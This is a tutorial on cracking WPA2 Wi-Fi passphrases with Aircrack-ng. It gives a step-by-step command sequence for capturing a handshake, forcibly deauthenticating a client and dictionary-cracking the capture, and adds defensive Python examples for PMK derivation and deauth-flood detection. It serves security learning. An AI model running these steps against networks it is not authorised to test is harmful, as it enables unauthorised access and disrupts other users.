Cracking Wi-Fi Passwords using Aircrack-ng!

By: George Bousygine

March 08, 2021


Background

What is Wi-Fi?

  • Wireless networking technology used to connect devices to a network and the internet
  • Stands for Wireless Fidelity
  • Uses radio frequencies to send signals between devices
  • Operates on the 2.4 GHz and 5 GHz bands

What is Aircrack-ng?

  • A complete suite of tools to assess Wi-Fi network security (see the official website).

It focuses on different areas of Wi-Fi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).

Wi-Fi security protocols: WEP, WPA, WPA2, WPA3, WPS

WPA2

  • Stronger security than WPA, using a stronger encryption method
  • AES (Advanced Encryption Standard), which makes the encryption strong enough to resist brute-force attack, unlike WPA
  • Uses a 4-way handshake process to join the network

4 Way Handshake

[Diagram of the 4-way handshake]
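As an added example (not from the original post and not an Aircrack-ng tool), the following Python script shows what the handshake protects and what it does not: the pre-shared key (PMK) is derived from the passphrase and the SSID exactly as hostapd's wpa_passphrase does, so the passphrase itself never crosses the air, but anyone holding a captured handshake can derive a PMK from each candidate passphrase and test it offline. The only control on the network owner's side is a passphrase whose keyspace is too large to enumerate, which the policy comparison at the end illustrates. The sample SSID, passphrase, policy figures and the derivation rate are constructed assumptions; the "password"/"IEEE" pair is the test vector published in IEEE 802.11i.

```python
import hashlib
from typing import Dict

# Constructed sample values for this example (not a real network).
SAMPLE_SSID = "ExampleNet"
SAMPLE_PASSPHRASE = "correct horse battery staple"

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PMK_LEN = 32               # 256-bit PMK


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2 pre-shared key (PMK) from passphrase and SSID.

    Same computation hostapd's wpa_passphrase performs: PBKDF2-HMAC-SHA1
    with the SSID as salt, 4096 iterations, 32-byte output. Station and AP
    each compute it locally; the 4-way handshake only carries nonces and
    MICs derived from it, which is why a captured handshake can be checked
    against candidate passphrases offline.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, dklen=PMK_LEN)


def check_known_vector() -> bool:
    """Self-check against the 802.11i test vector (passphrase 'password', SSID 'IEEE')."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidate passphrases of a given length over an alphabet."""
    return alphabet_size ** length


def days_to_exhaust(candidates: int, pmk_per_second: float) -> float:
    """Worst-case days to try every candidate at a given PMK derivation rate.

    The rate is an assumption you measure on your own hardware. Each guess
    costs 2 x 4096 HMAC-SHA1 computations (two PBKDF2 blocks for 32 bytes),
    which is what limits the rate, not the strength of AES.
    """
    return candidates / pmk_per_second / 86400.0


def policy_report(pmk_per_second: float) -> Dict[str, float]:
    """Compare common passphrase policies (constructed figures) at one rate."""
    policies = {
        "8 lowercase letters": keyspace(26, 8),
        "8 digits (router-default style)": keyspace(10, 8),
        "10 mixed case + digits": keyspace(62, 10),
        "4 random words from a 7776-word list": keyspace(7776, 4),
    }
    return {name: days_to_exhaust(n, pmk_per_second) for name, n in policies.items()}


if __name__ == "__main__":
    print("known vector ok:", check_known_vector())
    print(f"PMK for {SAMPLE_SSID!r}: {derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID).hex()}")
    for name, days in policy_report(1_000_000.0).items():   # assumed rate: 1M PMK/s
        print(f"{name:40s} {days:18.2f} days")
```

The rate passed to policy_report is deliberately a parameter: the same table looks very different at a laptop CPU's rate and at a GPU cluster's, and the point of the comparison is that only the last two policies stay out of reach at any realistic rate.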

Demonstration

Before we begin, the computer must have a network adapter that supports monitor mode.

Find out what chipset and driver you need from the Aircrack-ng compatibility documentation.

  1. Check what mode wlan0 is in:
    $ iwconfig

    This should be in “Managed mode”.

  2. Kill all other processes (we don’t want anything to interfere with what we are doing):
    $ sudo airmon-ng check kill

  3. Change the interface into monitor mode:
    $ sudo airmon-ng start wlan0

    Check again what mode we are in using the first command.

  4. Find out the AP’s MAC address and channel:
    $ sudo airodump-ng wlan0

    Note - Only do this on your own network or with permission on other ones!!!

  5. Open another terminal to capture the 4-way handshake:
    $ sudo airodump-ng -w ["name of file"] -c ["Channel Number"] --bssid ["MAC Address"] wlan0

  6. In the first terminal, deauthenticate a client from the network:
    $ sudo aireplay-ng --deauth 0 -a ["MAC Address"] wlan0

    While waiting for the client to reconnect, step 5 will capture the 4-way handshake.

  7. Crack the file:
    $ sudo aircrack-ng [".cap File"] -w ["Word List"]

    To stop monitor mode run the following command:
    $ sudo airmon-ng stop wlan0
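The deauthentication step in the procedure above is the part a defender can most readily see: the injected frames are unauthenticated management frames, they arrive in a burst, and they carry the AP's own address as transmitter and the broadcast address as receiver. The following Python script is an added example (not part of the original post and not an Aircrack-ng tool): it decodes the 802.11 management header of raw frames and raises one alert per transmitter that sends a burst of deauthentication or disassociation frames. The MAC addresses, the sample capture, the window and threshold values are constructed assumptions for the demonstration.

```python
import struct
from collections import defaultdict, deque
from typing import Dict, Iterable, List, Optional, Tuple

# (type, subtype) pairs from the 802.11 frame-control field. Type 0 is
# management; subtype 12 is deauthentication, 10 is disassociation.
DEAUTH = (0, 12)
DISASSOC = (0, 10)
BEACON_SUBTYPE = 8
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed addresses for the sample capture (not real devices).
AP = "02:00:00:00:aa:01"
STA = "02:00:00:00:bb:02"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str,
                     reason: Optional[int] = None) -> bytes:
    """Build a minimal 802.11 management frame: 24-byte MAC header plus an
    optional 2-byte reason-code body. No radiotap header, no FCS. Used only
    to construct sample data for this example."""
    fc0 = (subtype << 4) | (0 << 2) | 0        # subtype, type 0 (management), version 0
    header = (struct.pack("<BBH", fc0, 0, 0)    # frame control byte 0, flags, duration
              + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
              + struct.pack("<H", 0))           # sequence control
    body = struct.pack("<H", reason) if reason is not None else b""
    return header + body


def parse_frame(raw: bytes) -> Dict[str, object]:
    """Decode the fields a deauth detector needs from a raw 802.11 frame."""
    if len(raw) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0 = raw[0]
    frame: Dict[str, object] = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "dst": mac_str(raw[4:10]),     # addr1: receiver
        "src": mac_str(raw[10:16]),    # addr2: transmitter
        "bssid": mac_str(raw[16:22]),  # addr3: BSSID for management frames
    }
    if (frame["type"], frame["subtype"]) in (DEAUTH, DISASSOC) and len(raw) >= 26:
        frame["reason"] = struct.unpack("<H", raw[24:26])[0]
    return frame


def detect_deauth_floods(frames: Iterable[Tuple[float, bytes]],
                         window_s: float = 1.0, threshold: int = 10) -> List[Dict[str, object]]:
    """Return one alert per transmitter that sends at least `threshold`
    deauth/disassoc frames inside any `window_s`-second sliding window.
    `frames` are (timestamp_seconds, raw_frame) pairs in time order."""
    recent: Dict[str, deque] = defaultdict(deque)
    alerted = set()
    alerts: List[Dict[str, object]] = []
    for ts, raw in frames:
        f = parse_frame(raw)
        if (f["type"], f["subtype"]) not in (DEAUTH, DISASSOC):
            continue
        q = recent[str(f["src"])]
        q.append(ts)
        while q and ts - q[0] > window_s:       # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and f["src"] not in alerted:
            alerted.add(f["src"])
            alerts.append({"src": f["src"], "bssid": f["bssid"], "count": len(q),
                           "broadcast": f["dst"] == BROADCAST,
                           "reason": f.get("reason"), "at": ts})
    return alerts


def sample_capture() -> List[Tuple[float, bytes]]:
    """Constructed capture: normal beacons, one ordinary deauth from a client
    leaving (reason 3), then a burst of 30 broadcast deauths in 0.3 s that
    carry the AP's address as transmitter (reason 7, as injected bursts do)."""
    frames = [(i * 0.1, build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP, AP)) for i in range(20)]
    frames.append((2.5, build_mgmt_frame(12, AP, STA, AP, reason=3)))
    frames += [(5.0 + i * 0.01, build_mgmt_frame(12, BROADCAST, AP, AP, reason=7)) for i in range(30)]
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_capture()):
        print("deauth burst:", alert)
```

To run it on a real monitor-mode capture, strip the radiotap header first (for instance with scapy's RadioTap layer) and pass the remaining bytes with the packet timestamp; a single deauth from a client that is genuinely leaving never reaches the threshold. The durable mitigation is 802.11w Protected Management Frames: WPA3 requires it and many WPA2 access points offer it as an option, and with it enabled a client discards deauthentication frames that are not MIC-protected with the session key.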